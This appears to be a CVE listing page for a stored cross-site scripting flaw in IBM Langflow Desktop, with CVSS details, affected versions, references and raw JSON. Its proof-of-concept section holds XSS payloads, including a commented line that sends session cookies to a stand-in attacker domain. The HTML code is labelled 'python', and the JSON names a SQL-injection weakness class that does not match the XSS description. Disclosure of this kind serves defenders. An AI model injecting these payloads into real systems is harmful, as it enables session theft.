CVE-2026-3346

Description

IBM Langflow Desktop 1.6.0 through 1.8.4 Lanflow is vulnerable to stored cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.

CVSS Details

CVSS Score

6.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:langflow:langflow_desktop:*:*:*:*:*:*:*:* - VULNERABLE

IBM Langflow Desktop 1.6.0

IBM Langflow Desktop 1.6.1

IBM Langflow Desktop 1.7.x

IBM Langflow Desktop 1.8.0

IBM Langflow Desktop 1.8.1

IBM Langflow Desktop 1.8.2

IBM Langflow Desktop 1.8.3

IBM Langflow Desktop 1.8.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!--
PoC for CVE-2026-3346 (Stored XSS)
Context: Inject into a vulnerable input field (e.g., Node Description) in IBM Langflow Desktop.
-->

<script>
  // Simple Proof of Concept to demonstrate execution
  alert('CVE-2026-3346 XSS Triggered: ' + document.cookie);

  // Advanced payload: Exfiltrate session data to an external server
  // fetch('https://attacker-controlled-domain.com/collect?data=' + encodeURIComponent(document.cookie));
</script>

<!-- Alternatively, using an image tag to trigger requests without script blocks if filters are basic -->
<img src=x onerror="alert('XSS via Image Tag')">

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-3346
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-3346
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-3346/
[4] VulDB https://vuldb.com/cve/CVE-2026-3346
[5] https://www.ibm.com/support/pages/node/7271095

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-3346", "sourceIdentifier": "[email protected]", "published": "2026-04-30T21:16:32.610", "lastModified": "2026-05-11T17:06:09.163", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Langflow Desktop 1.6.0 through 1.8.4 Lanflow is vulnerable to stored cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:langflow:langflow_desktop:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.6.0", "versionEndIncluding": "1.8.4", "matchCriteriaId": "826FDA9F-F22A-49AC-96F1-7EDD14D90261"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7271095", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}